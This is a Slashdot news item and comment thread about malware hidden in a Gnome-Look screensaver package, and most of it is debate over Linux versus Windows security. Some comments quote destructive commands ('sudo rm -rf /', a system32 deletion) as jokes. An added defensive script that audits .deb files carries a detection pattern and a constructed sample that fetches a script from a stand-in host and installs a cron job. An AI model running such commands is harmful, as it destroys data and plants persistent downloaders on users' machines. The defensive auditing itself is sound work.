
Malware Found Hidden In Screensaver On Gnome-Look

timothy posted more than 4 years ago | from the sudo-you-know-what-you're-sudoing dept.

Security 611

AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.

611 comments

Not more safe (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382128)

It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because its marketshare is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.

This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

The funny thing about this is the same as with Mac OS X users. All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".

And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.

The only reason malware problems are smaller on Linux than Windows is because of the almost-non-existing desktop marketshare and that those who use it on desktop are usually more tech savvy.

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

Re:Not more safe (5, Insightful)

nschubach (922175) | more than 4 years ago | (#30382196)

The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...

It's not more secure because of its market share, it's more secure because anyone can fix it.

Re:Not more safe (4, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382240)

But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.

And even so, if the vulnerability is in let's say flash, just anyone or distros can't fix that closed source application.

Re:Not more safe (5, Insightful)

nschubach (922175) | more than 4 years ago | (#30382304)

The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.

It's really the potential quantity of solutions to the problem.

I could argue with you that this vulnerability might have been fixed sooner with more market share.

Re:Not more safe (4, Informative)

sopssa (1498795) | more than 4 years ago | (#30382350)

But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.

Re:Not more safe (3, Insightful)

nschubach (922175) | more than 4 years ago | (#30382484)

You are arguing about ignorance of users, not the security of the OS...

Re:Not more safe (0, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382364)

You're a sodding fscktard. Distros do not pick up public binaries and bundle them unless they're from $BIG_COMPANY like Nvidia. All distros use the projects' source and have dedicated maintainers for each package. You have no idea what you are talking about.

So going by your 11 year old logic, the Internet cannot function. After all, it's 90+% held together with unix and linux systems, mostly open source applications too. So why oh why are they not an anarchy of spam and DoS bots, and 99+% of the crap coming from the tiny windows servers that do little more than handle parked pages for the old backhander from MS sales execs?

When you reach puberty, have real contact with the opposite sex (assuming you're not a gay apple fangay), you'll understand elementary system architecture.

Re:Not more safe (1)

Jetboy01 (550638) | more than 4 years ago | (#30382494)

And the hardest part of all is making sure that the end-user actually bothers performing the updates!

Re:Not more safe (5, Insightful)

sbeckstead (555647) | more than 4 years ago | (#30382258)

Wrong, anyone can not fix it. Any one MAY fix it.

Only the tech savvy programmer types that care enough to fix can fix it.

Re:Not more safe (5, Insightful)

_merlin (160982) | more than 4 years ago | (#30382278)

Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.

Re:Not more safe (2, Insightful)

nschubach (922175) | more than 4 years ago | (#30382378)

But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.

Re:Not more safe (1)

royallthefourth (1564389) | more than 4 years ago | (#30382418)

But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

Not true. It affects the system as a whole because packages need root privileges to install.

Re:Not more safe (2, Insightful)

Anonymous Coward | more than 4 years ago | (#30382712)

1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
2. Even if installed centrally, the applications inside are still run with user privileges.
3. If some application in the package requires setuid rights, it will be detected by the package manager.

Re:Not more safe (4, Informative)

sopssa (1498795) | more than 4 years ago | (#30382432)

But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history malware tried to just fuck over the computer which would have required root access, but now it's just about sending spam or stealing data.

Re:Not more safe (2, Funny)

nschubach (922175) | more than 4 years ago | (#30382522)

... which has nothing to do with how secure the operating system is, but the profile itself.

Re:Not more safe (1)

Goaway (82658) | more than 4 years ago | (#30382466)

And how many desktop Linux machines even have more than one user?

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382576)

Technically, all of them. They have a root user and the regular user at least. If they only have a root user, they are asking for trouble, imposed by themselves. In most cases, there are users created for some applications (for instance FTP) that have even stricter access than someone with local login permissions.

Re:Not more safe (3, Informative)

soundguy (415780) | more than 4 years ago | (#30382674)

Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

Re:Not more safe (1)

Rockoon (1252108) | more than 4 years ago | (#30382726)

They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

I'm a bag of mostly water you insensitive clod!

Re:Not more safe (1)

TheDarkener (198348) | more than 4 years ago | (#30382624)

Every LTSP installation ever?

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382288)

Yes, but clueless users aren't going to be knowledgeable enough to download and install the patch. Hell, they probably won't even notice they're infected until months later.

Re:Not more safe (5, Insightful)

kai_hiwatari (1642285) | more than 4 years ago | (#30382322)

This particular malware is not because of a security problem with the OS. It is more of a social engineering thing - trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver.

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382414)

Yeah, but now that the malware was created, it shouldn't be long before someone prevents another screensaver from doing this again... that's what I was getting at.

Even if it isn't patched immediately, a Linux screensaver has lower potential of screwing up the entire system folder with its payload.

Re:Not more safe (1)

couchslug (175151) | more than 4 years ago | (#30382548)

"trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver."

Screensavers are an easy threat to negate. I don't run them, on any OS.
It's natural to bait people who prefer fluff over control with fluff.

Re:Not more safe (4, Insightful)

Anonymous Coward | more than 4 years ago | (#30382702)

This particular malware is not because of a security problem with the OS.

Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.

Re:Not more safe (1)

nhytefall (1415959) | more than 4 years ago | (#30382198)

Agreed.

The easiest, and most effective, way to avoid issues with malware/spyware/etc is to not be an idiot.

Code is code... regardless of the platform it was developed on/for... code still runs if written correctly.

Re:Not more safe (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#30382208)

You're an idiot.

Re:Not more safe (3, Insightful)

phantomcircuit (938963) | more than 4 years ago | (#30382212)

This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

Well that's why the goal is to get as much of the third party software into the repository as possible.

Re:Not more safe (2, Interesting)

Goaway (82658) | more than 4 years ago | (#30382500)

And thus you raise the threshold for entry for new third-party software.

Re:Not more safe (1)

phantomcircuit (938963) | more than 4 years ago | (#30382542)

That's kind of the point...

Re:Not more safe (5, Insightful)

Anonymous Coward | more than 4 years ago | (#30382220)

All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.

Re:Not more safe (2, Interesting)

sopssa (1498795) | more than 4 years ago | (#30382286)

Any (good) linux sysadmin knows that there have been many Linux worms in the history. Yes, history. You're also referencing to a 2003 Windows worm here.

Conficker aside, such worms are pretty much in history. Most malware nowadays comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)

Re:Not more safe (2, Interesting)

DragonWriter (970822) | more than 4 years ago | (#30382486)

Most malware nowadays comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)

There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.

While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks by providing elegant, non-intrusive ways to provide the control users need without always running as a superuser before Windows did much in that regard, it shares with Windows a fairly all or nothing security model in many regards that is particularly susceptible to trojans.

Re:Not more safe (1)

kenshin33 (1694322) | more than 4 years ago | (#30382604)

And most Linux systems are kinda locked down. Privilege separation. Every day's simple tasks don't need root privileges. Though, distros like Ubuntu are killing that a bit with the "sudo" philosophy (implicit privilege gain, like the annoying thing in VISTA). Whereas the old "su" approach (explicitly requesting root privilege in a terminal) is less vulnerable to this kind of tricks. Worst case user's files get erased (backup backup and backup). But the whole system integrity is untouched.

Re:Not more safe (2, Insightful)

Suiggy (1544213) | more than 4 years ago | (#30382230)

I agree. The best software in the world can't protect itself from clueless ignorant users who don't know any better. The more clueless, ignorant users using the software, the higher the rate of occurrence of exploitation. If Linux were to become as popular as Windows, I guarantee it would have just as many problems as Windows users currently suffer from.

Re:Not more safe (0, Troll)

nschubach (922175) | more than 4 years ago | (#30382332)

One major difference is that malware on Windows can screw up the entire system where Linux will most likely only screw up one profile.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382446)

It doesn't help when you have a clueless ignorant user involved. Teach such a person how to use sudo and inevitably they're going to elevate privileges requested by malware. I mean, by golly, if they want to install that screen saver with cute kittens, then they're going to install it, sudo be damned. Most people aren't as paranoid as you or I may be when it comes to trusting the content and software we download, and they may not be able to draw the association with it possibly having a trojan/virus payload. After all, all they see are the cute kittens.

Re:Not more safe (1)

nschubach (922175) | more than 4 years ago | (#30382612)

Truthfully, I'm not sure if screen savers require root access to install, but it wouldn't be that difficult to change that. Each user picks their own screensaver so it goes to say that it could be stored and run from their own binary folder.

That's also why I don't give my parents the sudo password.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382668)

Normally, screen savers do not require admin privileges to run, you just run them out of your user directory. But in this case, the screensaver was packaged in a .deb which does require administrator privileges. sudo dpkg -i cute_kittens_screen_saver.deb

Re:Not more safe (5, Interesting)

nurb432 (527695) | more than 4 years ago | (#30382476)

Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.

And if you can't trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.

Re:Not more safe (1)

Anonymous Coward | more than 4 years ago | (#30382246)

The difference is that on windows, malware can install itself just by looking at it.
To get this linux malware you need to sudo and install a package.

If I tell you to type "sudo rm -rf /" and enter your password when asked, will we see article like "OMG! UBUNTU GOT MALWARE" the next day too?

The point is, if you do not want malware, do not install it.

Re:Not more safe (1)

eln (21727) | more than 4 years ago | (#30382390)

So how often do you download a package from somewhere, unpack it, and go line by line through the source to make sure it's safe before installing it on your box? Probably not very often, because that would be a huge pain and even most Linux users won't be able to understand the code well enough to make a good judgment. On a server box, you'll likely stick to production repositories direct from your vendor, so the risk of malware is low, but I'm sure most people have downloaded packages from third parties for their desktop systems and run them without being absolutely sure they were safe. With Linux, you can get away with this because none of the malware writers care enough about Linux to port their software to it, but they certainly would if it gained significant market share.

Re:Not more safe (1)

Suiggy (1544213) | more than 4 years ago | (#30382554)

[quote] If i tell you to type "sudo rm -rf /" and enter your password when asked, will we see article like "OMG! UBUNTU GOT MALWARE" the next day too? [/quote] You would be surprised. If Linux were popular, and were used by many people who were novice users, such as is the case with Windows, then yes, they would be doing exactly that. It's a common joke on certain tech forums and image boards to trick users into entering "runas /profile /user:administrator del c:\windows\system32" and many unsuspecting people fall for it.

Re:Not more safe (5, Interesting)

_merlin (160982) | more than 4 years ago | (#30382248)

It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no-one wants.

Re:Not more safe (1)

ChienAndalu (1293930) | more than 4 years ago | (#30382408)

The difference is that there isn't a common software repository for windows like there is for Linux. If you want a screensaver for Linux, you can get tons with xscreensaver. For windows, the software ecosystem is much more confusing.

Google's netbook won't even have the capability to install software.

Re:Not more safe (2, Insightful)

sopssa (1498795) | more than 4 years ago | (#30382464)

The software ecosystem is "much more confusing" because it's an OS with 95% marketshare and there's millions of 3rd party programs and games for users. And they really want and need those.

Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.

Re:Not more safe (1, Insightful)

JoshuaZ (1134087) | more than 4 years ago | (#30382264)

Not really. Linux does a better job in many ways of dealing with serious security holes. While you are correct that if marketshare was reversed there would be a corresponding flip in total malware, I suspect that the amount of malware targeting Linux in our alternate universe would be less than the amount of malware targeting Windows in the real universe. Likely the same order of magnitude, but still different. (I'm ignoring for now the issue of how one would reasonably measure or even define how much malware is out there targeting a given system).

The real lesson here is that at the end of the day it still comes down to who the users are. Users who are paranoid are less likely to get problems. Most people don't have the resources or will to be paranoid.

Re:Not more safe (5, Interesting)

Anonymous Coward | more than 4 years ago | (#30382268)

You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on windows, but for most things I need to do on linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.

Repositories are getting a lot better too, I don't use ubuntu any more but when I left the PPA was in ascendancy, which seemed to allow a much better enforcement of security while still letting 3rd party stuff in.

Re:Not more safe (4, Insightful)

NoobixCube (1133473) | more than 4 years ago | (#30382442)

Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.

When you install a theme the normal way, you just drag the archive file - that is to say, no executable parts, or any way to make the parts executable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privileges because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unnecessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different to Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.
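
One way to pay attention to what a .deb will do before running `sudo dpkg -i` on it, added here as an example and not part of the thread or of any poster's comment. It relies on `dpkg-deb -e` and `dpkg-deb -c`; the function names, the pattern lists and the sample package contents are this example's own assumptions.

```shell
#!/bin/sh
# Added example: review a .deb before installing it as root.
# Function names and pattern lists are hypothetical choices of this example.

# Maintainer-script lines worth reading by hand: downloads, cron/init
# persistence, setuid/setgid changes. A match is a prompt to look, not a verdict.
SCRIPT_PATTERNS='wget|curl|crontab|/etc/cron|/etc/init\.d|/etc/rc|update-rc\.d|chmod +[ugoa]*\+[rwxt]*s|chmod +[2467][0-7]{3}'

# audit_scripts DIR: scan the maintainer scripts that `dpkg-deb -e`
# extracted into DIR. dpkg runs these as root during installation.
audit_scripts() {
    dir=$1
    for s in preinst postinst prerm postrm config; do
        [ -f "$dir/$s" ] || continue
        { grep -nE "$SCRIPT_PATTERNS" "$dir/$s" || true; } | sed "s|^|SCRIPT  $s:|"
    done
    return 0
}

# audit_listing: read `dpkg-deb -c` output on stdin and report
# setuid/setgid files and files dropped into autorun locations.
audit_listing() {
    awk '
        $1 ~ /^-..[sS]/ || $1 ~ /^-.....[sS]/ { print "SETID   " $6 }
        $1 !~ /^d/ && $6 ~ "^(\\./)?/?etc/(cron[^/]*|init\\.d|rc[0-9S]\\.d|profile\\.d|xdg/autostart)/." {
            print "AUTORUN " $6
        }
    '
}

# audit_deb FILE: run both checks on a real package without installing it.
# Returns 0 if nothing was flagged, 1 if there are findings, 2 on error.
audit_deb() {
    deb=$1
    tmp=$(mktemp -d) || return 2
    if ! dpkg-deb -e "$deb" "$tmp/control"; then
        rm -rf "$tmp"
        return 2
    fi
    {
        audit_scripts "$tmp/control"
        dpkg-deb -c "$deb" | audit_listing
    } > "$tmp/findings"
    cat "$tmp/findings"
    if [ -s "$tmp/findings" ]; then rc=1; else rc=0; fi
    rm -rf "$tmp"
    return "$rc"
}

# demo_constructed: the same checks on constructed sample input
# (not the contents of the package discussed in the story).
demo_constructed() {
    d=$(mktemp -d) || return 2
    cat > "$d/postinst" <<'EOF'
#!/bin/sh
# constructed sample for this example
wget -q http://example.invalid/extra.sh -O /usr/local/bin/extra.sh
cp /usr/share/example-saver/job /etc/cron.d/example-saver
EOF
    audit_scripts "$d"
    audit_listing <<'EOF'
drwxr-xr-x root/root         0 2009-12-01 10:00 ./usr/share/example-saver/
-rw-r--r-- root/root     52310 2009-12-01 10:00 ./usr/share/example-saver/frame.png
-rwsr-xr-x root/root      9120 2009-12-01 10:00 ./usr/bin/example-helper
-rwxr-xr-x root/root       210 2009-12-01 10:00 ./etc/init.d/example-helper
EOF
    rm -rf "$d"
}

# With an argument, audit that package; without one, run the demo.
if [ "$#" -gt 0 ]; then
    audit_deb "$1"
else
    demo_constructed
fi
```

A screensaver or theme package that is clean on both checks ships only data files and has no maintainer script that reaches the network or touches cron, init or setuid bits.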

Re:Not more safe (1, Troll)

danomac (1032160) | more than 4 years ago | (#30382282)

There would definitely be more, but I seriously doubt as much as Windows. Most of the drive-by exploits require root privileges to do anything serious to the machine. Almost everything is used without root privileges and so those types of attacks plain don't work. (I'm referring to Windows computers being infected just by being plugged into the internet.) I can't remember the last time I heard of something like this happening with linux.

Voluntarily installed malware by using social tactics and the like will still affect linux, but the amount of damage it can do to the local machine is still far less than the damage that can happen to Windows.

Re:Not more safe (1)

sopssa (1498795) | more than 4 years ago | (#30382324)

But the thing is, most malware doesn't even need root access to do its job. Stealing users' data and sending spam works just as well from user base.

Requiring root access is mostly for those who want control over that exact machine, like hackers.

Re:Not more safe (1)

TrancePhreak (576593) | more than 4 years ago | (#30382706)

Several privilege escalation holes have been found in Linux over the years. They could have gotten root if they wanted.

Re:Not more safe (5, Insightful)

amasiancrasian (1132031) | more than 4 years ago | (#30382292)

I've been telling many the same thing, but with one exception; Mac and *nix have started out with a better permissions system and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g, the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.

While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompts were being triggered by transitioning software developers that did not save data in the user's home folder.

In the end, the security of any system relies on the ability for the user to authenticate and verify software downloaded. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.

Re:Not more safe (0, Troll)

amasiancrasian (1132031) | more than 4 years ago | (#30382310)

I would like to clarify that when I mean "not any more secure," I mean the current version of Windows 7 that implements a good permissions framework along with UAC. Mac OS X/*nix have a leg up with a strong permissions-based system from the very get-go.

Re:Not more safe (1)

maxume (22995) | more than 4 years ago | (#30382422)

You should talk about secure defaults, the only real change in Vista and Windows 7 was that accounts are not generally created as Administrators (I guess UAC adds a little more than just the UI, but not a great deal), both NT and XP share much of the underlying permissions framework...

Re:Not more safe (1)

davek (18465) | more than 4 years ago | (#30382396)

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

Absolutely FALSE! The numbers would be closer, but not equal. By definition, you cannot know all the vulnerabilities in "secret source" software, because they are simply not disclosed. This number is surely more than zero. Therefore, all other things being equal, open source will always prevail because the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

Re:Not more safe (0, Flamebait)

sexconker (1179573) | more than 4 years ago | (#30382638)

Absolutely FALSE! The numbers would be closer, but not equal. By definition, you cannot know all the vulnerabilities in "secret source" software, because they are simply not disclosed. This number is surely more than zero. Therefore, all other things being equal, open source will always prevail because the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

Absolute HOKUM! The numbers would be nearly identical. The protection of software being open source requires that you:

Trust the creator
Trust the host (to make sure it is unaltered)

Closed source software requires that you:
Trust the creator
Trust the host (often the creator)

The fact that you CAN read every line of code does not make the software safer. The fact that SOMEONE MAY does not make the software safer. The fact that someone DID does not make the software safer unless you trust that person for some reason.

The ONLY thing that makes the software safer is YOU reading and understanding every single line of code.

Closed source software is usually PAID for, with specific stipulations on what it can and can't do (feature-wise and security-wise). Money talks louder than "freedom", and unfortunately it always will.

Now, begin the closed source vs open source stability/support/security/update process data point cherry picking!

Here's my data point: Everything sucks and I'm disgusted that people put up with it - paid or not. (No, I'm not gonna do anything to fix it - I can idly bitch all I want!)

Re:Not more safe (1)

jedidiah (1196) | more than 4 years ago | (#30382412)

> And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not?

Linux doesn't go out of its way to do stupid things for a dubious gain in "convenience".

Linux never bought into this idea of blurring the line between data and programs. Linux never encouraged executing random executables from unknown and untrusted sources.

Neither did MacOS, or FreeBSD, or any of the commercial Unixen.

In that regard, merely avoiding Microsoft apps while running their OS can avoid most of the potential trouble.

Re:Not more safe (1)

Kjella (173770) | more than 4 years ago | (#30382440)

Linux can't cure idiocy. But the repositories are a pretty solid base of tools before they start wanting to shoot themselves in the foot. How many people are infected by the time they're done warezing up their computer with "basic" tools like Windows itself, MS Office etc? Quite many. How many people block or are blocked from patches because they're not a "genuine" install? It would help.

P.S. PDF is quite safe, Adobe PDF Reader on the other hand is not but luckily us Linux users in general don't use it. Same goes for flash, hopefully HTML5 will make it much less common because it's the flash player that is crappy, the standard is quite fine.

Re:Not more safe (1)

gandhi_2 (1108023) | more than 4 years ago | (#30382444)

Which is a great argument against monoculture, something the "linux zealots" have been warning us about for years.

Re:Not more safe (5, Insightful)

at_slashdot (674436) | more than 4 years ago | (#30382452)

You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.

Malware is a piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.

"Repositories won't help with that, because people want 3rd party programs and games."

I am happy with 25,000+ programs available in Debian repository, I never install random package from the Internet. At least the basic packages should be available from the repos so the risk is at least reduced if not eliminated (depending on the behavior of the user)

In my experience people who use the word "zealot" lack arguments.

Re:Not more safe (0)

Anonymous Coward | more than 4 years ago | (#30382504)

It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows.

Linux IS more secure against malware than Windows. It certainly isn't completely safe, but it's leaps and bounds ahead of Windows in that regard, marketshare aside.

Re:Not more safe (1)

SnarfQuest (469614) | more than 4 years ago | (#30382520)

In my experience, >90% of Windows systems that I am asked to look at are packed full of virus, adware, and other malware. I've only seen one Linux system infected with anything, and that was a long time ago.

The "inexistant desktop" meme doesn't matter to me. Besides being nonsense, the fact that Linux machines don't melt into a malware pile of crap 30 seconds after connecting to the internet, is what makes me prefer them. I don't think Windows machines could be more malware acceptable if Microsoft actually tried to design it to be so.

It is exploiting a weakpoint that can be resolved. (0)

Anonymous Coward | more than 4 years ago | (#30382592)

The tools exist that would have rendered this form of attack useless.

Linux has outlasted many forms of attack already. Hardening of the package system to prevent such problems is not hard.

Simple point is a lot of infection vectors don't exist in Linux. Package manager is one of the major targets left.

"And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable."

If your system is set up right you cannot. Browser inside a selinux sandbox. The tech to shut all this crap down is waiting in the wings. Just up until now there has been no critical need to deploy. Massive amount of damage risk can be contained.

Linux's response to the threats enabled more security.

Re:Not more safe (4, Insightful)

vadim_t (324782) | more than 4 years ago | (#30382686)

Sorry, this line of argument is stupid.

You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets less viruses because it has less marketshare.

But if so, why all the security advancements in the latest Windows versions? Why isn't it still using Win95 era security? Why did MS bother coding support for NX, UAC and so on? Well, because turns out, it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.

Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.

Re:Not more safe (1)

SanityInAnarchy (655584) | more than 4 years ago | (#30382690)

Repositories won't help with that, because people want 3rd party programs and games.

As phantomcircuit says, that's a reason to put more software in repositories, or provide sane sandboxing for it. Speaking of which, when have you bought a game at the store, and found it pre-infected with malware?

However, at least the option exists. Show me where I can have an even halfway decent experience on Windows while sticking to trusted sources. Seriously, try to live with only what's available on Microsoft Update. Contrast this with the tens, even hundreds of thousands of packages for your typical Linux distribution.

All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".

That's true, and I agree with you that this could be a problem. The solution to security is not merely to put people on another OS, it's to actually educate them about security.

That's also why you want to look at what tech-savvy people do for security, and how easy it is for them. If tech-savvy people on Linux get most of their software from repositories, and Windows and OS X don't have package management, that should tell you something.

However, I don't think it's harmful or incorrect to say that Linux is more secure than Windows, and that antivirus doesn't do much on either, other than protect you from yourself.

And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability?

On Windows, there are still significant browser vulnerabilities which would be problematic. Additionally, they've only even tried to start reducing user privileges with Vista -- before that, surfing porn sites would likely get your machine completely rooted, as opposed to just having access as an ordinary user.

Now consider browsers like Chrome, which actually sandbox the browser process, chroot it, and run it as a separate user.

That brings up another point: IE has historically been swiss cheese, as far as security is concerned, yet it is still the default browser on Windows. The default browser on most Linux distributions is Firefox.

Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.

Flash? Maybe. All the more reason to get rid of it, and promote standards for which there are actually alternate implementations, like html5. Or just use Gnash -- though admittedly, this significantly limits what will work for you, so far.

PDF? PDF is a file format, not a program. I don't view them with Adobe Reader -- on KDE, I use a program called Okular, and it's something else on GNOME. Good luck finding something that exploits all of these at once. And hey, if you do find an exploit in Okular, go ahead and fix it -- can't do that with Acrobat.

This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.

I don't think we can actually make that call.

First of all, Linux is not "one thing", even less so than Windows is. If Linux had 95% of the desktop marketshare, that would be Linux, and probably not even strictly Linux, but free Unix. You'd still have some people running FreeBSD, some people running OpenSolaris, some people running Ubuntu, some people running a custom-compiled Gentoo, and so on. The same things which make people imagine that porting proprietary software on Linux is hard (it really isn't), would make it much more difficult for an exploit to work.

Granted, most versions would probably have the vulnerability, but each version would have to be exploited slightly differently, since exploiting a buffer overflow (for example) requires intimate knowledge of where, exactly, everything will be.

Second, Intel would probably not be dominating the market so completely. Malware for x86 would have to be ported to x64, ARM, etc. Linux is ported to dozens of architectures, and most Linux programs are just as portable, since they're distributed as reasonably portable C source.

Finally, the market in general would be so completely different that to actually state something like this is moronic. For all we know, there would be more malware, but it'd all be distributed as some sort of source code, probably a script.

Re:Not more safe (-1, Troll)

Anonymous Coward | more than 4 years ago | (#30382728)

BS. OS X has been out for a number of years and has yet to be hit by malware. If Linux is cracked wide open with its insignificant market share, imagine the security nightmare if it had a real base.

I will stick to OS X, being virtually 100% secure, thank you very much.

Amazed I am (1)

sbeckstead (555647) | more than 4 years ago | (#30382214)

Hey malware creators just got wise to the fact that Geeks make more money than the average Joe?

Re:Amazed I am (1)

sexconker (1179573) | more than 4 years ago | (#30382672)

Hey malware creators just got wise to the fact that Geeks make more money than the average Joe?

Lies.

The proverbial Linux box is a P4 2.8 GHz with 512 MB of RAM that you're gonna upgrade to 1 GB soon.

The up-and-comer is a Core 2 Duo 2 GHz with 2 GB of RAM.

Surely Joe Tux Hack can afford better hardware!

Of course the ninja was infected... (-1, Offtopic)

NecroPuppy (222648) | more than 4 years ago | (#30382222)

The ninja is a cockroach.

He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.

Let this be a lesson to you, Remo. Never trust the ninja.

Re:Of course the ninja was infected... (2, Funny)

royallthefourth (1564389) | more than 4 years ago | (#30382340)

He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.

So Solaris users are unaffected?

YES! Finally! (5, Funny)

binarylarry (1338699) | more than 4 years ago | (#30382238)

It's the YEAR OF THE LINUX desktop! It's official! /Happy Ubuntu User

Removal instructions from the site (2, Insightful)

